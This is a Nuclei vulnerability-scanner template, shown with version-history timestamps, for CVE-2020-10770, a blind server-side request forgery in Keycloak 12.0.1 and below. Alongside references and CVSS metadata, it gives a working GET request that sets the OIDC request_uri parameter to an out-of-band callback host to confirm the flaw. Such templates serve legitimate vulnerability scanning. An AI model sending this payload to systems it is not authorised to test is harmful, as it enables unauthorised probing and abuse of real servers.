nuclei-templates/http/cves/2020/CVE-2020-10770.yaml

36 lines
1.3 KiB
YAML
Raw Normal View History

2021-10-17 15:59:45 +00:00
id: CVE-2020-10770
info:
2023-02-11 04:59:02 +00:00
name: Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)
2021-10-17 15:59:45 +00:00
author: dhiyaneshDk
2021-10-17 16:01:55 +00:00
severity: medium
2023-02-10 21:01:43 +00:00
description: Keycloak 12.0.1 and below allows an attacker to force the server to request an unverified URL using the OIDC parameter request_uri. This allows an attacker to execute a server-side request forgery (SSRF) attack.
2021-10-17 15:59:45 +00:00
reference:
- https://packetstormsecurity.com/files/164499/Keycloak-12.0.1-Server-Side-Request-Forgery.html
- https://www.exploit-db.com/exploits/50405
2021-10-18 15:33:29 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-10770
- https://bugzilla.redhat.com/show_bug.cgi?id=1846270
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2020-10770
2023-02-10 21:01:43 +00:00
cwe-id: CWE-918
cpe: cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*
epss-score: 0.36659
tags: keycloak,ssrf,oast,cve,cve2020,blind,packetstorm,edb
metadata:
max-request: 1
2021-10-17 15:59:45 +00:00
http:
2021-10-17 15:59:45 +00:00
- method: GET
path:
- '{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/'
2021-10-18 15:33:29 +00:00
2021-10-17 15:59:45 +00:00
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by cs 08/03/2022